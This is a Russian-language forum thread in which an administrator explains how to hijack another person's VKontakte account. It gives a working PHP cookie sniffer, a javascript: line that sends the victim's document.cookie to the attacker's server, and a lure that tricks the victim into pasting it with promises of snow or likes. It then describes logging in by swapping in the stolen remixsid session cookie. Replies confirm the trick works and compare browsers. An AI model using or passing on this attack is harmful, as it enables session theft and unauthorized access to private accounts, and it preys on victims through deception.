Взламываем Вк неподозревающего врага

  • Добро пожаловать на наш форум Гость !
    Чтобы пользоваться всеми его возможностями необходимо Зарегистрироваться
    Без регистрации Вы сможете просматривать только определенные темы
    Зарегистрироваться здесь, чтобы воспользоваться всеми функциями форума.

mk7even

Администратор
banan power
1,061
499
74
Нам нужен будет ftp сервер. На нем надо создать папку, называем ее next.
Выбираем эту папку и жмем кнопку chmod, появятся галочки, ставим на все и жмем сохранить. Внутри папки создаём файл index.php
Далее ткрываем и пишем снифер:
XML:
<?php
//получаем данные с ссылки
$cookie = $_SERVER['REQUEST_URI'];
//ip адрес
$ip = $_SERVER['REMOTE_ADDR'];
//Создаём файл
$file = fopen("snif.dat","a+");
//вычисляем текущее время
$time = date("H:i:M:d");
//добавляем в строковую переменную куки + время + ip
$add_text = "$ip $time $cookie";
//записываем данные в файл
fputs($file,$add_text.",\r\n");
//закрываем файл
fclose($file);
//что бы не спалили переносим пользователя обратно в вк
header('Location:https://vk.com');
?>
Снифер готов. У нас должно получиться такая ссылка:
http://ваш_домен.ру/next/index.php
Далее открываем любой текстовый редактор (например блокнот) и пишем:
javascript:window.location.href = "http://ваш_домен.ру/next/index.php?cookie="+document.cookie;
И скидывает это нашему дружку. Пишем ему например:
«Если поставишь это в адресную строку на твоей странице пойдет снег или на всех твоих фотках на странице будет по 10 000 лайков!».
Тут подход ко всем разный, надо немного использовать СИ.
Если он запустит этот скрипт в адресной строке, то её сразу переведёт в стартовую страницу Вконтакте. Никакой снег, конечно же, не пойдет там у него, но зато у нас на сервере будет дат файл с его куками.
Далее нам нужна подмена уведенных куков.
Самый простой способ:
Открываем браузер Опера > Настройки > Общие настройки > Расширенные > Cookies Opera Cookies.
Достаточно изменить только значение параметра куков remixsid.
Обновляем страницу и сразу же входим в другой аккаунт, без всякого логина и пароля. При этом наш друг не узнает, то что мы вошли на его страницу. Методы анонимности выбирайте сами. Такие дела.
 

it

Новорег
1
0
0
Работает отлично!! Safari на iphone 6 не даёт, а в остальных браузерах и устройствах круто)
 

Pinkman

Устройство для аннигиляции материальных объектов
340
113
58
Войдите или зарегистрируйтесь чтобы увидеть ссылку, нет, иначе бы куки со стиллиров не работали... а они еще как работают
 

disengine

Новорег
12
0
3
Провел пару тестов :)
1) Мозилла, как и Хром обрезают слово "javascript" - жертве нужно будет вводить его самому (что собственно усложняет задание)
2) Даже если жертва введет вручную не достающий кусок кода - в мозиле (по крайней мере у меня) - этот код не сработал
3) В Хроме код срабатывает, но есть одно маленькое НО: логируются все параметры куки кроме remixsid =D
Он почему-то упорно не появляется логе снифа... Хотя на страничке вк присутствует.
П,С, И правда - если подставить remixsid жертвы в свои куки, то мы окажемся в его\ее аккаунте )))